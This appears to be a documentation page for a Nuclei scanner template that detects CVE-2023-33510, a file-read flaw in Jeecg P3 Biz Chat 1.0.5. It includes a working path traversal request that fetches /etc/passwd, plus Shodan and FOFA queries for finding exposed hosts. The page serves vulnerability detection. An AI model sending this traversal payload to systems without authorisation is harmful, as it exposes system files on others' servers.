Jeecg P3 Biz Chat - Local File Inclusion
ID: CVE-2023-33510
Severity: high
Author: DhiyaneshDK
Tags: cve2023,cve,jeecg,lfi,jeecg_p3_biz_chat_project,wordpress
Description
Section titled “Description”Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.
YAML Source
Section titled “YAML Source”id: CVE-2023-33510
info: name: Jeecg P3 Biz Chat - Local File Inclusion author: DhiyaneshDK severity: high description: | Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters. impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in Jeecg P3 Biz Chat. reference: - https://twitter.com/momika233/status/1670701256535572481 - https://carl1l.github.io/2023/05/08/jeecg-p3-biz-chat-1-0-5-jar-has-arbitrary-file-read-vulnerability/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33510 - https://github.com/izj007/wechat classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-33510 cwe-id: CWE-668 epss-score: 0.00406 epss-percentile: 0.73689 cpe: cpe:2.3:a:jeecg_p3_biz_chat_project:jeecg_p3_biz_chat:1.0.5:*:*:*:*:wordpress:*:* metadata: verified: "true" max-request: 1 vendor: jeecg_p3_biz_chat_project product: jeecg_p3_biz_chat framework: wordpress shodan-query: http.favicon.hash:1380908726 fofa-query: icon_hash=1380908726 tags: cve2023,cve,jeecg,lfi,jeecg_p3_biz_chat_project,wordpress
http: - method: GET path: - "{{BaseURL}}/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd"
matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a004730450220379c1eaadcedd9e9de98320b9c87e83508ede9037b5910c3b5c9cb80ff5cfd8b022100f7447be729c1154f8873fc23c75efe82b79bf8428c0d08da6921e643502db6b6:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-33510.yaml"